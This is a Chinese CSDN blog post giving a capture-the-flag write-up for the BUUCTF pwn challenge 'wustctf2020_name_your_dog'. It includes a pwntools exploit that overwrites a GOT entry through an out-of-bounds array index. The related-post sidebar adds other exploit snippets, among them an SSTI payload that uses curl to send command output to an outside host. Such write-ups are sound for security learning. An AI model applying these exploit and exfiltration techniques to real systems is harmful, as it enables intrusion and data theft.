BUUCTF之“wustctf2020_name_your_dog”

最新推荐文章于 2022-04-28 09:38:44 发布
最新推荐文章于 2022-04-28 09:38:44 发布
阅读量173 收藏
点赞数
分类专栏: 二进制pwn学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/122080742
版权

这题的两个输入让我对于修改函数的got.plt地址,从而间接执行我们想要的函数

在这里插入图片描述
这里al是上文传来的bss段的地址
学习别的师傅的文章了解到:bss段距离调用函数一般必经之地:"got.plt"地址非常近,我们细心算一下发现不过50字节左右,上面的图片两次输入就是往某个地址写入数据的意思,那么将“__isoc99_scanf”的got.plt修改位后门函数即可。

WP:

from pwn import*
#p=process('./dog')
p=remote('node4.buuoj.cn',28334)
elf=ELF('./dog')

shell=0x80485cb
p.sendlineafter('>','-7')
p.sendlineafter("Give your name plz: ",p32(shell))

p.interactive()

小小小结:

  1. 利用往某个地址特别是"got.plt"地址输入(达到覆盖修改的目的)数据,可以间接执行我们想要的函数,因为一般的函数执行都要利用"got.plt"地址去寻找函数真正地址。
  2. 利用输入函数去修改。
Hvf0x
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-19
weixin_44145820的博客
05-09 465
目录wustctf2020_name_your_catwustctf2020_name_your_dog wustctf2020_name_your_cat 在NameWhich函数中没有越界检查 我们调试看一下 0xffd31214就是char v3[40]的地址 而在0xffd3124c处就存放着函数返回地址 0xffd3124c-0xffd31214=0x38 0x38/8=7 所以我们name 7 就能修改这个返回地址了 Exp: from pwn import * r = remote
[BUUCTF-pwn]——wustctf2020_name_your_dog
Y_peak的博客
03-10 314
[BUUCTF-pwn]——wustctf2020_name_your_dog 题目地址:https://buuoj.cn/challenges#wustctf2020_name_your_dog checksec看下, 在IDA中看下, 竟然有后门函数,我们只需要执行该函数就好 看完代码发现, 没有什么可以溢出的地方. 唯一可以找到修改一些东西的只有, 这个函数, %7s虽然限定了长度但是足够写进去一个地址了. 看一下它的上一级, 调用发现Dogs在bss段距离got表很近, 意味着我们可以修改
wustctf2020_name_your_dog
m0_57754423的博客
04-06 3092
这里存在数组越界,没有进行检查,所以我们可以任意地址写,这里写got为shell即可 from pwn import * p = remote("node4.buuoj.cn",27085) shell = 0x080485CB p.sendlineafter(">",'-7') p.sendlineafter("Give your name plz: ",p32(shell)) p.interactive() ...
wustctf2020_name_your_dog(数组越界劫持got)
m0_51251108的博客
11-05 249
wustctf2020_name_your_dog: 有一道类似的叫name_your_cat,是数组越界 逆向分析: 主界面 NameWhich函数: 根本没检查边界,num我们随便取,依旧数组越界 后门 具体步骤: got表可写,got表就在dog上面不远处,我们能改__isoc99_scanf,printf printf=0x0804A00C __isoc99_scanf=0x0804A028 dog=0x804a060 由于与print相差不是8的倍数,我们选scanf num填(0x28
BUUCTF刷题6
m0_51251108的博客
11-03 418
题目:gyctf_2020_some_thing_exceting:mrctf2020_shellcode_revenge:axb_2019_brop64:inndy_echo:wustctf2020_name_your_cat:wdb2018_guess:oneshot_tjctf_2016:zctf2016_note2:ciscn_2019_final_2:wustctf2020_number_game: gyctf_2020_some_thing_exceting: 这题存在uaf漏洞 程序开始时读入
[BUUCTF]PWN——wustctf2020_name_your_dog(越界修改got表)
mcmuyanga的博客
03-18 459
wustctf2020_name_your_dog 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,检索字符的时候发现了后门函数,shell_addr=0x80485cb 主要函数,感觉跟cat那题差不多 漏洞函数 ...
Python中__name__的使用实例
09-22
主要介绍了Python中__name__的使用实例,并总结了两种情况下__name__的值会是什么,需要的朋友可以参考下
Python的Flask框架中SERVER_NAME域名项的配置教程
09-21
SERVER_NAME项在Flask的路由配置中至关重要,特别是在配置绝对url和子域名的操作中,这里我们就来看一下Python的Flask框架中SERVER_NAME项的配置教程:
x_name.rar_We Two
09-21
For the Name type we need a SEQUENCE OF { SET OF X509_NAME_ENTRY so declare two template wrappers for this.
Python关于__name__属性的含义和作用详解
09-17
在本篇文章里小编给大家分享的是关于Python关于__name__属性的含义和作用知识点,需要的朋友们可以参考下。
PHP_SELF,SCRIPT_NAME,REQUEST_URI区别
10-25
主要介绍了PHP_SELF,SCRIPT_NAME,REQUEST_URI区别,需要的朋友可以参考下
WUST-CTF2020-WP
夏日 の blog
03-29 5290
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
BUUCTF [SUCTF2018]single dog
m0_49025459的博客
01-20 2459
题目 解压附件是一个图片,放到kali里面看看 看见里面有个压缩包,我们把它分离出来,发现里面有一个文本文档 百度一下发现是AAEncode加密 解密之后就是flag SUCTF{happy double eleven} ...
wustctf2020_name_your_cat
z1r0的博客
01-17 641
wustctf2020_name_your_cat 查看保护 可以看到v3是一个数组,而v0是namewhich返回值,假如参数v0可控那么v3就可以被溢出。 v2是namewhich的返回值,这里v2可控,vuln函数中v3可以进行溢出 距离ebp 0x34。0x34 + 4 = 8 * 7 = 56,v2为7时刚好可以覆盖到ret。这时再输入name为shell这个后门函数即可。 from pwn import * context(arch='i386', os='linux', log_lev
[BUUCTF]PWN——wustctf2020_name_your_cat(数组越界)
mcmuyanga的博客
03-13 1255
wustctf2020_name_your_cat 附件 步骤 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,在检索字符串的时候发现了后门 主要函数
[GWCTF 2019]你的名字
qq_43801002的博客
07-28 1359
题目 过程 1.在 ssti 中过滤了后, 可以通过{%外带 {% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://xx.xxx.xx.xx:8080/?i=ls /') %}1{% endif %} 由于有黑名单,这里使用得操作是利用blacklist里面最后一个进行绕过。 只要在其他语句加入他,那么就可以绕过其他语句了。 但是不知道他得blackl
BUUCTF:[SUCTF2018]single dog
末初的CSDN博客
11-03 2254
题目地址:https://buuoj.cn/challenges#[SUCTF2018]single%20dog attachment.jpg binwalk分析,foremost分离 aaencode编码 AAEncode:http://www.atoolbox.net/Tool.php?Id=703 flag{happy double eleven}
BUUCTF misc 专题(68)[SUCTF2018]single dog
tt_npc的博客
04-28 1186
看题目,single dog,下载附件 是这样一张图片,先查看属性的详情信息,并没有任何发现,将它拖入winhex查看 在底部发现了压缩包 拖入kali中分离出压缩包 打开压缩包查看 发现是一个txt 这就想到了jjencode和aaencode解密 jjencode与aaencode解密工具-jjencode解密-aaencode解密-在线工具 将文本全选进框,点击aaencode解密 得到答案SUCTF{happy double eleven} 包上...
DB_NAME="your_database_name"
最新发布
05-05
将 "your_database_name" 替换为您实际使用的数据库名称。在 Django 项目的 settings.py 文件中,您可以使用以下代码读取该环境变量并将其分配给 DATABASES 中的 NAME 字段: ``` import os DATABASES = { '...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值